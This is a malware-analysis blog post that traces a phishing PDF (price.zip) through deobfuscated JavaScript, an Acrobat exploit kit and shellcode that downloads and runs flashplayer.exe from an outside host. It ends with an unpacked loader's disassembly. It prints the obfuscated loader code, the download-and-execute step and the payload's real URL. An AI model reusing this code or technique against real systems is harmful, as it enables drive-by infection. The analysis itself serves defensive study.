Please consider donating: https://www.corelan.be/index.php/donate/


12,816 views

Malicious pdf analysis : from price.zip to flashplayer.exe

Introduction

This morning, my generic attachment filter for MS Exchange reported about 100 emails that have been put in quarantine because they contained a small zip file :

image

Email header :

Received: from hosting1.i-excom.net ([87.106.13.96])  
   18 Nov 2010 10:23:47 +0100
Received: (qmail 558 invoked from network);
   18 Nov 2010 10:22:46 +0100
Received: from 41-135-4-212.dsl.mweb.co.za (HELO 192.168.2.3) (41.135.4.212) 
         by hosting1.i-excom.net with SMTP;
   18 Nov 2010 10:22:43 +0100
Received: from [10.10.0.11] by 192.168.2.3 id ib1m4s-000JkE-00;
   Thu, 18 Nov2010 11:49:01 +0200
Message-ID: <009601cb8704$ef9f3b00$0b000a0a@192.168.2.3>
From: 
To: 
Subject: Re: lista de precios!
Date: Thu, 18 Nov 2010 11:49:01 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
   boundary="----------B21C218F271B9A77"
Return-Path: pichi5@ozu.es

When looking inside the zip file, I found a small pdf file…  I immediately figured this file was up to no good, so it was time to get my hands dirty :)

This morning, VirusTotal reports that the pdf file is clean (0/43)…  But that doesn’t mean anything, does it.

When running the same analysis again (4 hours later), only 2 vendors seem to be catching it : PCTools and Symantec :

image

What follows are some short notes about the malicious pdf analysis :

Analysing the pdf file

First, I ran pdfid.py and pdf-parser.py against the pdf file.

pdfif.py shows that the file contains javascript :

root@bt:/pentest/pdf# ./pdfid.py price.pdf
PDFiD 0.0.11 price.pdf
 PDF Header: %PDF-1.3
 obj                    3
 endobj                 3
 stream                 0
 endstream              0
 xref                   1
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0

Both "strings" and "pdf-parser.py" indicate that there are 2 "interesting" objects :

object 1 0 : contains javascript code

image

object 3 0 : contains a big array (/Producer tag)

image

At first sight, I would expect that the the javascript code will use the array one way or another to reproduce payload & execute it… Let’s figure out how it’s been done :

De-obfuscating & Re-assembling the original payload

The javascript code was slightly obfuscated and will

  • use String.fromCharCode to convert ascii values to char
  • subtract one value from another in the array to get to the ascii value (that gets converted to char)
  • all chars together result in a new javascript routine
  • execute the routine using eval

Original code :

vc = \(function\(\){return this;}\).call\(null\);
ew = new Date\(\);
var kx='';
var mxkk = 'e'+\(parseInt\(ew.getFullYear\(\)\)-1\)+'a'+kx+'l';
yh=vc[mxkk.replace\('2009','v'\)];
function qm\(\){
        var agno='',apx=[];
        var kx='';
        yh\('va'+kx+'r mirx=th'+kx+'i'+kx+'s'\);
        yh\('va'+kx+'r ib=Str'+kx+'ing.f'+kx+'romC'+kx+'harCode'\);
        var qkm='prod' + ew.getFullYear\(\)+'er';
        var fz = mirx[qkm.replace\('2010','uc'\)];
        var aqa = '' + ew.getFullYear\(\) + kx + 'i'+kx+'t';
        var ws = 's' + aqa.replace\('2010','pl'\);
        var fwrb='2010';
        fwrb = fwrb.replace\(ew.getFullYear\(\),''\);
        yh\('va'+fwrb+'r n' + kx + 'r=[' + fz + fwrb + ']'\);
        var ji = nr;
        vofw='le'+kx+'ng'+kx+'th';
        var ra = ji[vofw]
   / 2;
        for \(var kdx = 0; kdx < ra; kdx++\) {
                agno += ib\(ji[kdx+ra] - ji[kdx]\);
        }
        return agno;
        }
        var ga=qm\(\);
        yh\(ga\);


I modified the code so I could retrieve the decoded/de-obfuscated payload :

vc = (function() { return this; }).call(null);
ew = new Date();
var kx='';
var mxkk = 'e'+(parseInt(ew.getFullYear())-1)+'a'+kx+'l';
yh=vc[mxkk.replace('2009','v')];

function qm()
{
    alert("Inside function");
    var agno='';
    var apx=[];
    var kx='';
    var producer = [1008,... ];   // insert the array from the Producer tag here
    yh('va'+kx+'r mirx=th'+kx+'i'+kx+'s');
    yh('va'+kx+'r ib=Str'+kx+'ing.f'+kx+'romC'+kx+'harCode');
    var qkm='prod' + ew.getFullYear()+'er';
    var fz = mirx[qkm.replace('2010','uc')];
    var aqa = '' + ew.getFullYear() + kx + 'i'+kx+'t';
    var ws = 's' + aqa.replace('2010','pl');
    var fwrb='2010';
    fwrb = fwrb.replace(ew.getFullYear(),'');
    yh('va'+fwrb+'r n' + kx + 'r=[' + fz + fwrb + ']');
    var ji = nr;
    vofw='le'+kx+'ng'+kx+'th';
    var ra = producer.length / 2;
      for (var kdx = 0; kdx < ra; kdx++)
      {
            agno += String.fromCharCode( producer[kdx+ra] - producer[kdx] );
      }
      alert(agno);
}
var ga=qm();
yh(ga);

Some highlights from the code :

  • mxkk = eval()
  • var ib = string.fromCharCode
  • ws = split()

When running the javascript, you will get this :

image

… and that looks like another javascript routine to me :)

clip_image002

As you can see in this code :

  • payload is stored in the xp variable
  • it uses heap sprays (trying to jump to 0c0c0c0c and/or 0a0a0a0a) etc
  • it tries to trigger overflows by attempting to abuse a number of bugs in Acrobat Reader (util.printf(), media.newPlayer(), and others) -  CVE-2008-2992, CVE-2009-4324, CVE-2007-5659, CVE-2009-0927 and perhaps others.  Exploit kit FTW :)

Note : you can use online services to analyse pdf files as well :

image

image

image

 

Analyzing the payload

I converted the payload in the xp variable to bytes and used shellcodetest.c to run the payload and opened the shellcodetest executable in immunity debugger :

The payload itself (in var ‘xp’) uses a typical GetPC routine (so it can run from anywhere in memory) and then starts by decoding the actual payload (XOR AL,1B) :

image

After the decoder stub has ended, the decoded payload starts by getting a pointer to urlmon (string stored on the stack), so apparently it will attempt to load that dll and use one or more functions in that dll :

image

Then the code locates the base of kernel32 (so it can dynamically load the dll if it’s not loaded already)

image

The function pointer to loadlibrary is located and stored in eax :

image

And then it loads urlmon.dll

Next, it located the URLDownloadToCacheFileA function inside urlmon.dll

image

The code attempts to download file http://fryloop.net/flashplayer.exe and stores it in the temporary internet files.  I bet that’s not a real flashplayer :)

image

image

As one could expect, it then looks up the function pointer for CreateProcessA

image

and executes the downloaded binary :

image

clip_image017

Analyzing flashplayer.exe

The downloaded executable looks pretty simple when seen in a disassembler (IDA) :

image

This most likely means that it will decode/unpack first (and recreate the real payload at runtime).

When opening the binary in a debugger and stepping through the initial instructions, we can see that the code allocates RWX memory in the heap : (1384 bytes)

image

Next, an iteration is executed, which decodes data and writes it to the new location in the heap. The decoding uses a SUB and XOR instruction, using 2 static keys

image

After the decoder has finished, the following code has been written to the heap:

00890000   55               PUSH EBP
00890001   58               POP EAX
00890002   58               POP EAX
00890003   5E               POP ESI
00890004   83C4 F4          ADD ESP,-0C
00890007   E8 1A000000      CALL 00890026
0089000C   80D5 03          ADC CH,3
0089000F   7B 72            JPO SHORT 00890083
00890011   006E 00          ADD BYTE PTR DS:[ESI],CH
00890014   65:006C00 33     ADD BYTE PTR GS:[EAX+EAX+33],CH
00890019   0032             ADD BYTE PTR DS:[EDX],DH
0089001B   002E             ADD BYTE PTR DS:[ESI],CH
0089001D   006400 6C        ADD BYTE PTR DS:[EAX+EAX+6C],AH
00890021   006C00 00        ADD BYTE PTR DS:[EAX+EAX],CH
00890025   0058 50          ADD BYTE PTR DS:[EAX+50],BL
00890028   8100 CB2A6185    ADD DWORD PTR DS:[EAX],85612ACB
0089002E   FFD6             CALL ESI
00890030   8BD8             MOV EBX,EAX
00890032   0343 3C          ADD EAX,DWORD PTR DS:[EBX+3C]
00890035   8178 50 00800400 CMP DWORD PTR DS:[EAX+50],48000
0089003C   76 2B            JBE SHORT 00890069
0089003E   E8 C2040000      CALL 00890505
00890043   5D               POP EBP
00890044   8BF5             MOV ESI,EBP
00890046   B9 11000000      MOV ECX,11
0089004B   AD               LODS DWORD PTR DS:[ESI]
0089004C   E8 AE020000      CALL 008902FF
00890051   8946 FC          MOV DWORD PTR DS:[ESI-4],EAX
00890054  ^E2 F5            LOOPD SHORT 0089004B
00890056   E8 39040000      CALL 00890494
0089005B   FFD6             CALL ESI
0089005D   5E               POP ESI
0089005E   873424           XCHG DWORD PTR SS:[ESP],ESI
00890061   56               PUSH ESI
00890062   E8 EE030000      CALL 00890455
00890067   E8 56040000      CALL 008904C2
0089006C   8BF8             MOV EDI,EAX
0089006E   6A 00            PUSH 0
00890070   6A 00            PUSH 0
00890072   FF75 50          PUSH DWORD PTR SS:[EBP+50]
00890075   57               PUSH EDI
00890076   FF55 30          CALL DWORD PTR SS:[EBP+30]
00890079   50               PUSH EAX
0089007A   8BC4             MOV EAX,ESP
0089007C   6A 00            PUSH 0
0089007E   50               PUSH EAX
0089007F   FF75 54          PUSH DWORD PTR SS:[EBP+54]
00890082   56               PUSH ESI
00890083   57               PUSH EDI
00890084   FF55 34          CALL DWORD PTR SS:[EBP+34]
00890087   58               POP EAX
00890088   57               PUSH EDI
00890089   FF55 18          CALL DWORD PTR SS:[EBP+18]
0089008C   E8 38030000      CALL 008903C9
00890091   56               PUSH ESI
00890092   8B4D 54          MOV ECX,DWORD PTR SS:[EBP+54]
00890095   8D3C31           LEA EDI,DWORD PTR DS:[ECX+ESI]
00890098   D1E9             SHR ECX,1
0089009A   4F               DEC EDI
0089009B   8A17             MOV DL,BYTE PTR DS:[EDI]
0089009D   AC               LODS BYTE PTR DS:[ESI]
0089009E   8856 FF          MOV BYTE PTR DS:[ESI-1],DL
008900A1   8807             MOV BYTE PTR DS:[EDI],AL
008900A3  ^E2 F5            LOOPD SHORT 0089009A
008900A5   5E               POP ESI
008900A6   8B46 3C          MOV EAX,DWORD PTR DS:[ESI+3C]
008900A9   8D0406           LEA EAX,DWORD PTR DS:[ESI+EAX]
008900AC   66:F740 16 0020  TEST WORD PTR DS:[EAX+16],2000
008900B2   75 16            JNZ SHORT 008900CA
008900B4   3958 34          CMP DWORD PTR DS:[EAX+34],EBX
008900B7   74 11            JE SHORT 008900CA
008900B9   8B58 34          MOV EBX,DWORD PTR DS:[EAX+34]
008900BC   6A 04            PUSH 4
008900BE   68 00300000      PUSH 3000
008900C3   FF70 50          PUSH DWORD PTR DS:[EAX+50]
008900C6   53               PUSH EBX
008900C7   FF55 10          CALL DWORD PTR SS:[EBP+10]
008900CA   8B7D 58          MOV EDI,DWORD PTR SS:[EBP+58]
008900CD   50               PUSH EAX
008900CE   54               PUSH ESP
008900CF   6A 04            PUSH 4
008900D1   57               PUSH EDI
008900D2   53               PUSH EBX
008900D3   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008900D6   54               PUSH ESP
008900D7   6A 02            PUSH 2
008900D9   57               PUSH EDI
008900DA   53               PUSH EBX
008900DB   56               PUSH ESI
008900DC   8BCF             MOV ECX,EDI
008900DE   8BFB             MOV EDI,EBX
008900E0   F3:A4            REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
008900E2   5E               POP ESI
008900E3   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008900E6   58               POP EAX
008900E7   8BCE             MOV ECX,ESI
008900E9   0349 3C          ADD ECX,DWORD PTR DS:[ECX+3C]
008900EC   8D79 18          LEA EDI,DWORD PTR DS:[ECX+18]
008900EF   8B57 20          MOV EDX,DWORD PTR DS:[EDI+20]
008900F2   0FB741 14        MOVZX EAX,WORD PTR DS:[ECX+14]
008900F6   03F8             ADD EDI,EAX
008900F8   0FB749 06        MOVZX ECX,WORD PTR DS:[ECX+6]
008900FC   60               PUSHAD
008900FD   8B47 14          MOV EAX,DWORD PTR DS:[EDI+14]
00890100   85C0             TEST EAX,EAX
00890102   74 41            JE SHORT 00890145
00890104   8B47 08          MOV EAX,DWORD PTR DS:[EDI+8]
00890107   85C0             TEST EAX,EAX
00890109   74 3A            JE SHORT 00890145
0089010B   E8 70030000      CALL 00890480
00890110   8BC8             MOV ECX,EAX
00890112   8B47 24          MOV EAX,DWORD PTR DS:[EDI+24]
00890115   E8 6F020000      CALL 00890389
0089011A   0377 14          ADD ESI,DWORD PTR DS:[EDI+14]
0089011D   FF77 10          PUSH DWORD PTR DS:[EDI+10]
00890120   8B7F 0C          MOV EDI,DWORD PTR DS:[EDI+C]
00890123   03FB             ADD EDI,EBX
00890125   5B               POP EBX
00890126   50               PUSH EAX
00890127   8BD4             MOV EDX,ESP
00890129   52               PUSH EDX
0089012A   50               PUSH EAX
0089012B   51               PUSH ECX
0089012C   57               PUSH EDI
0089012D   51               PUSH ECX
0089012E   52               PUSH EDX
0089012F   6A 04            PUSH 4
00890131   51               PUSH ECX
00890132   57               PUSH EDI
00890133   FF55 0C          CALL DWORD PTR SS:[EBP+C]
00890136   59               POP ECX
00890137   33C0             XOR EAX,EAX
00890139   57               PUSH EDI
0089013A   F3:AA            REP STOS BYTE PTR ES:[EDI]
0089013C   5F               POP EDI
0089013D   8BCB             MOV ECX,EBX
0089013F   F3:A4            REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00890141   FF55 0C          CALL DWORD PTR SS:[EBP+C]
00890144   58               POP EAX
00890145   61               POPAD
00890146   83C7 28          ADD EDI,28
00890149  ^E2 B1            LOOPD SHORT 008900FC
0089014B   E8 05010000      CALL 00890255
00890150   E8 7B000000      CALL 008901D0
00890155   58               POP EAX
00890156   68 00400000      PUSH 4000
0089015B   FF75 54          PUSH DWORD PTR SS:[EBP+54]
0089015E   56               PUSH ESI
0089015F   8BFB             MOV EDI,EBX
00890161   8BF0             MOV ESI,EAX
00890163   E8 ED020000      CALL 00890455
00890168   64:FF35 30000000 PUSH DWORD PTR FS:[30]
0089016F   58               POP EAX
00890170   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
00890173   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
00890176   3958 18          CMP DWORD PTR DS:[EAX+18],EBX
00890179   74 04            JE SHORT 0089017F
0089017B   8B00             MOV EAX,DWORD PTR DS:[EAX]
0089017D  ^EB F7            JMP SHORT 00890176
0089017F   8B0C24           MOV ECX,DWORD PTR SS:[ESP]
00890182   0349 3C          ADD ECX,DWORD PTR DS:[ECX+3C]
00890185   8B71 28          MOV ESI,DWORD PTR DS:[ECX+28]
00890188   03F7             ADD ESI,EDI
0089018A   8978 18          MOV DWORD PTR DS:[EAX+18],EDI
0089018D   8970 1C          MOV DWORD PTR DS:[EAX+1C],ESI
00890190   66:F741 16 0020  TEST WORD PTR DS:[ECX+16],2000
00890196   75 0C            JNZ SHORT 008901A4
00890198   64:A1 18000000   MOV EAX,DWORD PTR FS:[18]
0089019E   8B40 30          MOV EAX,DWORD PTR DS:[EAX+30]
008901A1   8978 08          MOV DWORD PTR DS:[EAX+8],EDI
008901A4   FF55 14          CALL DWORD PTR SS:[EBP+14]
008901A7   5D               POP EBP
008901A8   C9               LEAVE
008901A9   897424 1C        MOV DWORD PTR SS:[ESP+1C],ESI
008901AD   61               POPAD
008901AE   50               PUSH EAX
008901AF   E8 51030000      CALL 00890505
008901B4   58               POP EAX
008901B5   8178 48 00020000 CMP DWORD PTR DS:[EAX+48],200
008901BC   75 0F            JNZ SHORT 008901CD
008901BE   8B0424           MOV EAX,DWORD PTR SS:[ESP]
008901C1   C70424 00000000  MOV DWORD PTR SS:[ESP],0
008901C8   FF7424 04        PUSH DWORD PTR SS:[ESP+4]
008901CC   50               PUSH EAX
008901CD   33C0             XOR EAX,EAX
008901CF   C3               RETN
008901D0   60               PUSHAD
008901D1   8BF3             MOV ESI,EBX
008901D3   0376 3C          ADD ESI,DWORD PTR DS:[ESI+3C]
008901D6   8BB6 80000000    MOV ESI,DWORD PTR DS:[ESI+80]
008901DC   85F6             TEST ESI,ESI
008901DE   74 73            JE SHORT 00890253
008901E0   03F3             ADD ESI,EBX
008901E2   8B7E 0C          MOV EDI,DWORD PTR DS:[ESI+C]
008901E5   85FF             TEST EDI,EDI
008901E7   74 6A            JE SHORT 00890253
008901E9   03FB             ADD EDI,EBX
008901EB   57               PUSH EDI
008901EC   FF55 04          CALL DWORD PTR SS:[EBP+4]
008901EF   85C0             TEST EAX,EAX
008901F1   75 04            JNZ SHORT 008901F7
008901F3   57               PUSH EDI
008901F4   FF55 00          CALL DWORD PTR SS:[EBP]
008901F7   50               PUSH EAX
008901F8   56               PUSH ESI
008901F9   8B76 10          MOV ESI,DWORD PTR DS:[ESI+10]
008901FC   03F3             ADD ESI,EBX
008901FE   8BFE             MOV EDI,ESI
00890200   AD               LODS DWORD PTR DS:[ESI]
00890201   85C0             TEST EAX,EAX
00890203  ^75 FB            JNZ SHORT 00890200
00890205   2BF7             SUB ESI,EDI
00890207   8BCE             MOV ECX,ESI
00890209   5E               POP ESI
0089020A   51               PUSH ECX
0089020B   50               PUSH EAX
0089020C   54               PUSH ESP
0089020D   6A 04            PUSH 4
0089020F   51               PUSH ECX
00890210   57               PUSH EDI
00890211   FF55 0C          CALL DWORD PTR SS:[EBP+C]
00890214   56               PUSH ESI
00890215   8B06             MOV EAX,DWORD PTR DS:[ESI]
00890217   85C0             TEST EAX,EAX
00890219   75 03            JNZ SHORT 0089021E
0089021B   8B46 10          MOV EAX,DWORD PTR DS:[ESI+10]
0089021E   8D3403           LEA ESI,DWORD PTR DS:[EBX+EAX]
00890221   57               PUSH EDI
00890222   AD               LODS DWORD PTR DS:[ESI]
00890223   85C0             TEST EAX,EAX
00890225   74 1B            JE SHORT 00890242
00890227   A9 00000080      TEST EAX,80000000
0089022C   75 04            JNZ SHORT 00890232
0089022E   8D4403 02        LEA EAX,DWORD PTR DS:[EBX+EAX+2]
00890232   25 FFFFFF7F      AND EAX,7FFFFFFF
00890237   50               PUSH EAX
00890238   FF7424 14        PUSH DWORD PTR SS:[ESP+14]
0089023C   FF55 08          CALL DWORD PTR SS:[EBP+8]
0089023F   AB               STOS DWORD PTR ES:[EDI]
00890240  ^EB E0            JMP SHORT 00890222
00890242   5F               POP EDI
00890243   5E               POP ESI
00890244   58               POP EAX
00890245   59               POP ECX
00890246   54               PUSH ESP
00890247   50               PUSH EAX
00890248   51               PUSH ECX
00890249   57               PUSH EDI
0089024A   FF55 0C          CALL DWORD PTR SS:[EBP+C]
0089024D   58               POP EAX
0089024E   83C6 14          ADD ESI,14
00890251  ^EB 8F            JMP SHORT 008901E2
00890253   61               POPAD
00890254   C3               RETN
00890255   60               PUSHAD
00890256   8BD3             MOV EDX,EBX
00890258   8BF2             MOV ESI,EDX
0089025A   0376 3C          ADD ESI,DWORD PTR DS:[ESI+3C]
0089025D   2B56 34          SUB EDX,DWORD PTR DS:[ESI+34]
00890260   85D2             TEST EDX,EDX
00890262   0F84 95000000    JE 008902FD
00890268   8B8E A4000000    MOV ECX,DWORD PTR DS:[ESI+A4]
0089026E   8BB6 A0000000    MOV ESI,DWORD PTR DS:[ESI+A0]
00890274   85F6             TEST ESI,ESI
00890276   0F84 81000000    JE 008902FD
0089027C   03F3             ADD ESI,EBX
0089027E   AD               LODS DWORD PTR DS:[ESI]
0089027F   8BF8             MOV EDI,EAX
00890281   03FB             ADD EDI,EBX
00890283   50               PUSH EAX
00890284   8BC4             MOV EAX,ESP
00890286   50               PUSH EAX
00890287   51               PUSH ECX
00890288   52               PUSH EDX
00890289   50               PUSH EAX
0089028A   6A 04            PUSH 4
0089028C   68 00100000      PUSH 1000
00890291   57               PUSH EDI
00890292   83E8 04          SUB EAX,4
00890295   50               PUSH EAX
00890296   6A 04            PUSH 4
00890298   68 00100000      PUSH 1000
0089029D   57               PUSH EDI
0089029E   810424 00100000  ADD DWORD PTR SS:[ESP],1000
008902A5   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008902A8   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008902AB   5A               POP EDX
008902AC   59               POP ECX
008902AD   AD               LODS DWORD PTR DS:[ESI]
008902AE   2BC8             SUB ECX,EAX
008902B0   51               PUSH ECX
008902B1   8BC8             MOV ECX,EAX
008902B3   D1E9             SHR ECX,1
008902B5   83E9 04          SUB ECX,4
008902B8   33C0             XOR EAX,EAX
008902BA   66:AD            LODS WORD PTR DS:[ESI]
008902BC   66:A9 0030       TEST AX,3000
008902C0   74 08            JE SHORT 008902CA
008902C2   25 FF0F0000      AND EAX,0FFF
008902C7   011407           ADD DWORD PTR DS:[EDI+EAX],EDX
008902CA  ^E2 EE            LOOPD SHORT 008902BA
008902CC   59               POP ECX
008902CD   8D4424 04        LEA EAX,DWORD PTR SS:[ESP+4]
008902D1   51               PUSH ECX
008902D2   52               PUSH EDX
008902D3   50               PUSH EAX
008902D4   FF30             PUSH DWORD PTR DS:[EAX]
008902D6   68 00100000      PUSH 1000
008902DB   57               PUSH EDI
008902DC   83E8 04          SUB EAX,4
008902DF   50               PUSH EAX
008902E0   FF30             PUSH DWORD PTR DS:[EAX]
008902E2   68 00100000      PUSH 1000
008902E7   57               PUSH EDI
008902E8   810424 00100000  ADD DWORD PTR SS:[ESP],1000
008902EF   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008902F2   FF55 0C          CALL DWORD PTR SS:[EBP+C]
008902F5   5A               POP EDX
008902F6   59               POP ECX
008902F7   58               POP EAX
008902F8   58               POP EAX
008902F9   85C9             TEST ECX,ECX
008902FB  ^75 81            JNZ SHORT 0089027E
008902FD   61               POPAD
008902FE   C3               RETN
008902FF   60               PUSHAD
00890300   EB 07            JMP SHORT 00890309
00890302   AD               LODS DWORD PTR DS:[ESI]
00890303  ^E2 FD            LOOPD SHORT 00890302
00890305   8D3403           LEA ESI,DWORD PTR DS:[EBX+EAX]
00890308   C3               RETN
00890309   8BE8             MOV EBP,EAX
0089030B   8BF3             MOV ESI,EBX
0089030D   B9 10000000      MOV ECX,10
00890312   E8 EBFFFFFF      CALL 00890302
00890317   B9 1F000000      MOV ECX,1F
0089031C   E8 E1FFFFFF      CALL 00890302
00890321   56               PUSH ESI
00890322   B9 07000000      MOV ECX,7
00890327   E8 D6FFFFFF      CALL 00890302
0089032C   8BD0             MOV EDX,EAX
0089032E   8B3424           MOV ESI,DWORD PTR SS:[ESP]
00890331   B9 09000000      MOV ECX,9
00890336   E8 C7FFFFFF      CALL 00890302
0089033B   8BFE             MOV EDI,ESI
0089033D   8BCA             MOV ECX,EDX
0089033F   E8 BEFFFFFF      CALL 00890302
00890344   33C0             XOR EAX,EAX
00890346   50               PUSH EAX
00890347   C1C8 07          ROR EAX,7
0089034A   C10424 0D        ROL DWORD PTR SS:[ESP],0D
0089034E   010424           ADD DWORD PTR SS:[ESP],EAX
00890351   AC               LODS BYTE PTR DS:[ESI]
00890352   84C0             TEST AL,AL
00890354  ^75 F1            JNZ SHORT 00890347
00890356   58               POP EAX
00890357   8BF7             MOV ESI,EDI
00890359   3BC5             CMP EAX,EBP
0089035B   74 03            JE SHORT 00890360
0089035D   4A               DEC EDX
0089035E  ^75 DD            JNZ SHORT 0089033D
00890360   8B3424           MOV ESI,DWORD PTR SS:[ESP]
00890363   B9 0A000000      MOV ECX,0A
00890368   E8 95FFFFFF      CALL 00890302
0089036D   0FB70C56         MOVZX ECX,WORD PTR DS:[ESI+EDX*2]
00890371   5E               POP ESI
00890372   51               PUSH ECX
00890373   B9 08000000      MOV ECX,8
00890378   E8 85FFFFFF      CALL 00890302
0089037D   59               POP ECX
0089037E   E8 7FFFFFFF      CALL 00890302
00890383   897424 1C        MOV DWORD PTR SS:[ESP+1C],ESI
00890387   61               POPAD
00890388   C3               RETN
00890389   51               PUSH ECX
0089038A   C1E8 1D          SHR EAX,1D
0089038D   B9 20000000      MOV ECX,20
00890392   48               DEC EAX
00890393   74 30            JE SHORT 008903C5
00890395   B9 02000000      MOV ECX,2
0089039A   48               DEC EAX
0089039B   74 28            JE SHORT 008903C5
0089039D   B9 20000000      MOV ECX,20
008903A2   48               DEC EAX
008903A3   74 20            JE SHORT 008903C5
008903A5   B9 04000000      MOV ECX,4
008903AA   48               DEC EAX
008903AB   74 18            JE SHORT 008903C5
008903AD   B9 40000000      MOV ECX,40
008903B2   48               DEC EAX
008903B3   74 10            JE SHORT 008903C5
008903B5   B9 04000000      MOV ECX,4
008903BA   48               DEC EAX
008903BB   74 08            JE SHORT 008903C5
008903BD   B9 40000000      MOV ECX,40
008903C2   48               DEC EAX
008903C3   74 00            JE SHORT 008903C5
008903C5   8BC1             MOV EAX,ECX
008903C7   59               POP ECX
008903C8   C3               RETN
008903C9   60               PUSHAD
008903CA   83EC 18          SUB ESP,18
008903CD   6A 1C            PUSH 1C
008903CF   6A 00            PUSH 0
008903D1   6A 04            PUSH 4
008903D3   FF55 1C          CALL DWORD PTR SS:[EBP+1C]
008903D6   8BD8             MOV EBX,EAX
008903D8   33FF             XOR EDI,EDI
008903DA   54               PUSH ESP
008903DB   53               PUSH EBX
008903DC   FF55 20          CALL DWORD PTR SS:[EBP+20]
008903DF   033C24           ADD EDI,DWORD PTR SS:[ESP]
008903E2   54               PUSH ESP
008903E3   53               PUSH EBX
008903E4   FF55 24          CALL DWORD PTR SS:[EBP+24]
008903E7   85C0             TEST EAX,EAX
008903E9  ^75 F4            JNZ SHORT 008903DF
008903EB   81FF 500F0000    CMP EDI,0F50
008903F1   77 01            JA SHORT 008903F4
008903F3   F1               INT1
008903F4   8B55 5C          MOV EDX,DWORD PTR SS:[EBP+5C]
008903F7   81F2 24BD6225    XOR EDX,2562BD24
008903FD   8B4D 54          MOV ECX,DWORD PTR SS:[EBP+54]
00890400   8BFE             MOV EDI,ESI
00890402   837D 44 00       CMP DWORD PTR SS:[EBP+44],0
00890406   74 03            JE SHORT 0089040B
00890408   0175 44          ADD DWORD PTR SS:[EBP+44],ESI
0089040B   8B45 4C          MOV EAX,DWORD PTR SS:[EBP+4C]
0089040E   85C0             TEST EAX,EAX
00890410   74 15            JE SHORT 00890427
00890412   8946 3C          MOV DWORD PTR DS:[ESI+3C],EAX
00890415   52               PUSH EDX
00890416   BA 04000000      MOV EDX,4
0089041B   E8 60000000      CALL 00890480
00890420   5A               POP EDX
00890421   03F0             ADD ESI,EAX
00890423   03F8             ADD EDI,EAX
00890425   2BC8             SUB ECX,EAX
00890427   3B75 44          CMP ESI,DWORD PTR SS:[EBP+44]
0089042A   75 0D            JNZ SHORT 00890439
0089042C   0375 48          ADD ESI,DWORD PTR SS:[EBP+48]
0089042F   037D 48          ADD EDI,DWORD PTR SS:[EBP+48]
00890432   2B4D 48          SUB ECX,DWORD PTR SS:[EBP+48]
00890435   85C9             TEST ECX,ECX
00890437   74 13            JE SHORT 0089044C
00890439   AD               LODS DWORD PTR DS:[ESI]
0089043A   85C0             TEST EAX,EAX
0089043C   74 08            JE SHORT 00890446
0089043E   3BC2             CMP EAX,EDX
00890440   74 04            JE SHORT 00890446
00890442   50               PUSH EAX
00890443   33C2             XOR EAX,EDX
00890445   5A               POP EDX
00890446   AB               STOS DWORD PTR ES:[EDI]
00890447   83E9 03          SUB ECX,3
0089044A  ^E2 DB            LOOPD SHORT 00890427
0089044C   53               PUSH EBX
0089044D   FF55 18          CALL DWORD PTR SS:[EBP+18]
00890450   83C4 1C          ADD ESP,1C
00890453   61               POPAD
00890454   C3               RETN
00890455   66:33F6          XOR SI,SI
00890458   66:BA 4D5A       MOV DX,5A4D
0089045C   66:AD            LODS WORD PTR DS:[ESI]
0089045E   66:33D0          XOR DX,AX
00890461   74 08            JE SHORT 0089046B
00890463   81EE 02100000    SUB ESI,1002
00890469  ^EB ED            JMP SHORT 00890458
0089046B   8D5E FE          LEA EBX,DWORD PTR DS:[ESI-2]
0089046E   8B76 3A          MOV ESI,DWORD PTR DS:[ESI+3A]
00890471   66:BA 5045       MOV DX,4550
00890475   8D341E           LEA ESI,DWORD PTR DS:[ESI+EBX]
00890478   66:AD            LODS WORD PTR DS:[ESI]
0089047A   66:33D0          XOR DX,AX
0089047D  ^75 E4            JNZ SHORT 00890463
0089047F   C3               RETN
00890480   51               PUSH ECX
00890481   33C9             XOR ECX,ECX
00890483   41               INC ECX
00890484   2BC2             SUB EAX,EDX
00890486   78 04            JS SHORT 0089048C
00890488   74 02            JE SHORT 0089048C
0089048A  ^EB F7            JMP SHORT 00890483
0089048C   33C0             XOR EAX,EAX
0089048E   03C2             ADD EAX,EDX
00890490  ^E2 FC            LOOPD SHORT 0089048E
00890492   59               POP ECX
00890493   C3               RETN
00890494   60               PUSHAD
00890495   8B7424 20        MOV ESI,DWORD PTR SS:[ESP+20]
00890499   FF55 38          CALL DWORD PTR SS:[EBP+38]
0089049C   50               PUSH EAX
0089049D   6A 00            PUSH 0
0089049F   6A 10            PUSH 10
008904A1   FF55 3C          CALL DWORD PTR SS:[EBP+3C]
008904A4   50               PUSH EAX
008904A5   6A 00            PUSH 0
008904A7   68 0B050000      PUSH 50B
008904AC   56               PUSH ESI
008904AD   83C6 02          ADD ESI,2
008904B0   56               PUSH ESI
008904B1   50               PUSH EAX
008904B2   FF55 40          CALL DWORD PTR SS:[EBP+40]
008904B5   C2 004D          RETN 4D00
008904B8   4D               DEC EBP
008904B9   FF55 18          CALL DWORD PTR SS:[EBP+18]
008904BC   896C24 08        MOV DWORD PTR SS:[ESP+8],EBP
008904C0   61               POPAD
008904C1   C3               RETN
008904C2   8B7D 54          MOV EDI,DWORD PTR SS:[EBP+54]
008904C5   6A 04            PUSH 4
008904C7   68 00100000      PUSH 1000
008904CC   57               PUSH EDI
008904CD   6A 00            PUSH 0
008904CF   FF55 10          CALL DWORD PTR SS:[EBP+10]
008904D2   8BF0             MOV ESI,EAX
008904D4   81EC 04010000    SUB ESP,104
008904DA   8BFC             MOV EDI,ESP
008904DC   68 04010000      PUSH 104
008904E1   57               PUSH EDI
008904E2   53               PUSH EBX
008904E3   FF55 28          CALL DWORD PTR SS:[EBP+28]
008904E6   6A 00            PUSH 0
008904E8   68 80000000      PUSH 80
008904ED   6A 03            PUSH 3
008904EF   6A 00            PUSH 0
008904F1   6A 01            PUSH 1
008904F3   68 00000080      PUSH 80000000
008904F8   57               PUSH EDI
